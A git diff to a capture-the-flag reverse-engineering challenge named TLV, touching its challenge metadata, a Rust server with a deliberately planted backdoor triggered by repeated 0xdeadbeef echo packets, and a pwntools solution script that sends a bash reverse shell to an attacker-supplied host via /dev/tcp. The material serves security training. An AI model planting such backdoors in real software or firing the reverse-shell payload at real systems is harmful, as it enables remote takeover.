diff --git a/reverse/TLV/challenge.yml b/reverse/TLV/challenge.yml index 5b809a1..b74de0a 100644 --- a/reverse/TLV/challenge.yml +++ b/reverse/TLV/challenge.yml @@ -7,7 +7,7 @@ description: | As an engineer for Andromeda, you are entrusted with the pivotal task of deciphering "Technological Labyrinth Vanguard", an obscure and long-forgotten network protocol embedded within the critical systems of Project Echo, the clandestine project spearheaded by OrionTech. Suspected to harbor vulnerabilities, TLV poses a significant threat to The Andromeda Initiative's mission to dismantle Project Echo and neutralize their nemesis. Your objective is to reverse engineer of TLV, identify its weaknesses, and devise a strategy to exploit them, thus crippling Project Echo and securing victory for The Andromeda Initiative. value: 500 -type: dynamic_docker +type: dynamic_docker extra: initial: 500 minimum: 100 @@ -28,5 +28,5 @@ files: - "public/Dockerfile" - "public/flag.txt" -state: visible +state: hidden version: "0.1" diff --git a/reverse/TLV/setup/main.rs b/reverse/TLV/setup/main.rs index c953347..67c2635 100644 --- a/reverse/TLV/setup/main.rs +++ b/reverse/TLV/setup/main.rs @@ -14,22 +14,10 @@ struct TLVPacket { } impl TLVPacket { - fn new(packet_type: u32, length: u32, mut value: Vec) -> Self { - // Truncate the value if its length exceeds the specified length - if value.len() > length as usize { - value.truncate(length as usize); - } - - TLVPacket { - packet_type, - length, - value, - } - } fn from_bytes(bytes: &[u8]) -> Option { let len = bytes.len(); - if bytes.len() < TYPE_LENGTH + LENGTH_LENGTH { + if len < TYPE_LENGTH + LENGTH_LENGTH { return None; } @@ -47,7 +35,7 @@ impl TLVPacket { bytes[4], ]) as usize; - if bytes.len() < TYPE_LENGTH + LENGTH_LENGTH + length { + if len != TYPE_LENGTH + LENGTH_LENGTH + length { return None; } @@ -99,7 +87,7 @@ impl TLVPacket { } fn handle_echo_packet(value: &[u8]) -> Vec { - let mut response = value.to_vec(); + let response = value.to_vec(); unsafe { if response.len() == 4 && u32::from_be_bytes([response[3], response[2], response[1], response[0]]) == 0xdeadbeef { BACKDOOR_TRIGGER += 1; @@ -168,7 +156,7 @@ fn handle_client(mut stream: TcpStream) { println!("Client disconnected"); unsafe { BACKDOOR_TRIGGER = 0; - } + } return; } } diff --git a/reverse/TLV/setup/tlv b/reverse/TLV/setup/tlv old mode 100644 new mode 100755 index acbd0d4..363f4cc Binary files a/reverse/TLV/setup/tlv and b/reverse/TLV/setup/tlv differ diff --git a/reverse/TLV/sol/sol.py b/reverse/TLV/sol/sol.py index af5e26c..60a1527 100644 --- a/reverse/TLV/sol/sol.py +++ b/reverse/TLV/sol/sol.py @@ -1,20 +1,23 @@ from pwn import * + def send_packet(packet_type, length, value): packet = p32(packet_type) + p32(length) + value return packet + def run(): if args.GDB: return gdb.debug(elf.path, gdbscript=gs) elif args.R: - HOST = args.R.split(':')[0] - PORT = args.R.split(':')[1] + HOST = args.R.split(":")[0] + PORT = args.R.split(":")[1] return remote(HOST, PORT) else: return process(elf.path) -conn= run() + +conn = run() # Craft and send packets to trigger the backdoor function # Type 0x4 echo packet to increment the backdoor_trigger @@ -27,13 +30,13 @@ def run(): conn.send(echo_packet) # # Craft and send a backdoor packet to execute "cat flag.txt" -LHOST = args.ATTACKER.split(':')[0] -LPORT = args.ATTACKER.split(':')[1] +LHOST = args.ATTACKER.split(":")[0] +LPORT = args.ATTACKER.split(":")[1] cmd = args.CMD -cmd = f'/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1' +cmd = f"/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1" -backdoor_packet = send_packet(0x4, 12, cmd.encode()) +backdoor_packet = send_packet(0x4, len(cmd), cmd.encode()) conn.send(backdoor_packet) conn.interactive()